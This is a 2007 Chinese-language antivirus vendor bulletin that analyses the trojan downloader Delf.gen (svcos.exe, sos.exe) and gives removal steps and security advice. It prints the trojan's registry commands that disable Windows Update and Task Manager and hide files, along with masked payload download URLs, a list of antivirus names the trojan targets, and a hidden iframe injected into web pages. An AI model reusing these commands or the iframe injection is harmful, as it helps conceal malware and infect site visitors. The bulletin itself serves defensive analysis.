Trojan-Downloader.Win32.Delf.gen(svcos.exe,sos.exe)病毒分析


出处:超级巡警团队 时间:2007年11月23日

    超级巡警团队监测到恶意程序Trojan-Downloader.Win32.Delf.gen变种发布速度很快,并且针对大多数反病毒软件进行了相应的处理,以逃避被查杀。该程序不仅会在网页文件中插入恶意框架代码,通过多种系统或应用程序漏洞传播木马,还会释放利用系统自动运行功能的autorun.inf文件及相应文件。
一、病毒相关分析:
 
    病毒标签:
        病毒名称:Trojan-Downloader.Win32.Delf.gen
        病毒类型:木马下载者
        危害级别:3
        感染平台:Windows
        病毒大小:34,424(字节)
        SHA1  :0801dacd6a579ec5f0ed5d97e7f336b59ea2fbb9
        加壳类型:未知
        开发工具:Delphi

    病毒行为:
        1、程序运行后,释放文件:
      %System%\Systom.exe
      %System%\auToRun.inf
      并在磁盘各个分区释放文件sos.exe和auToRun.inf
        2、执行以下命令,修改注册表:
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v
          DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f //禁用系统自动升级
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
          DisableTaskMgr /t REG_dword /d 00000001 /f       //禁用任务管理器
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t
          reg_dWord /d 00000000 /f                                //隐藏文件
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt
          /t reg_dword /d 00000001 /f                             //隐藏扩展名
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden
          /t reg_dword /d 00000000 /f                             //隐藏文件
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
          /v CheckedValue /t REG_SZ /d 0 /f                       //隐藏文件
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN"
          /v CheckedValue /t REG_dword /d 00000002 /f             //隐藏文件
        3、下载文件:
      http://*****/1.txt
      http://*****/2.txt
      http://*****/3.txt
      其中1.txt内容为:
      http://*****/mh.exe
      http://*****/ok.exe
      http://*****/Server.exe
      http://*****/uc.exe
      http://*****/t/servere.exe
      下载以上文件并重命名为?svchs0t.exe复制到系统目录%System%下    //?为从0开始数字
      其中2.txt内容为:
      360安全卫士
      卡巴
      瑞星
      麦咖啡
      NOD32
      木马
      防火墙
      专杀工具
        4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体
        5、在磁盘中所有网页文件尾部插入框架代码链接网马地址:
     <IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE>
     index.htm文件内容与网马利用漏洞如下图:
  
二、解决方案
    推荐方案:
         1、安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。
         2、升级系统及应用程序到最新版本。
         3、选择超级巡警“工具”中“智能扫描”功能中的“清除指定代码”,进行全盘扫描并清除插入网页文件中的框架
       代码。
         超级巡警下载地址:http://www.dswlab.com/d1.html
三、安全建议

       1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。
       2、根据实际安全级别需要适当考虑选用防火墙,并进行正确的设置。
       3、使用超级巡警的补丁检查功能,及时安装系统补丁。
       4、禁用或删除不必要的的帐号,对管理员帐号设置一个强壮的密码。
       5、禁用不必要的服务。
       6、及时更新常用软件,尤其是聊天工具。
       7、不要随意下载不安全网站的文件并运行。
       8、下载和新拷贝的文件要首先进行查毒。
       9、不要轻易打开即时通讯工具中发来的链接或可执行文件。
       10、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。
 

注: %System% 是一个可变路径,在windows95/98/me中该变量是指%Windir%\System,在WindowsNT/2000/XP/2003/VISTA中该变
   量指%Windir%\System32。其它:
       %SystemDrive%           系统安装的磁盘分区
       %SystemRoot% = %Windir%   WINDODWS系统目录
       %ProgramFiles%        应用程序默认安装目录
       %AppData%               应用程序数据目录
       %CommonProgramFiles%      公用文件目录
       %HomePath%              当前活动用户目录
       %Temp% =%Tmp%           当前活动用户临时目录
       %DriveLetter%           逻辑驱动器分区
       %HomeDrive%            当前用户系统所在分区

 

    超级巡警:彻底查杀各种木马,全面保护系统安全。
    更多免费工具下载:http://www.dswlab.com
    专业的桌面与内容安全产品:http://www.unnoo.com

Copyright(c) DSW Lab All rights reserved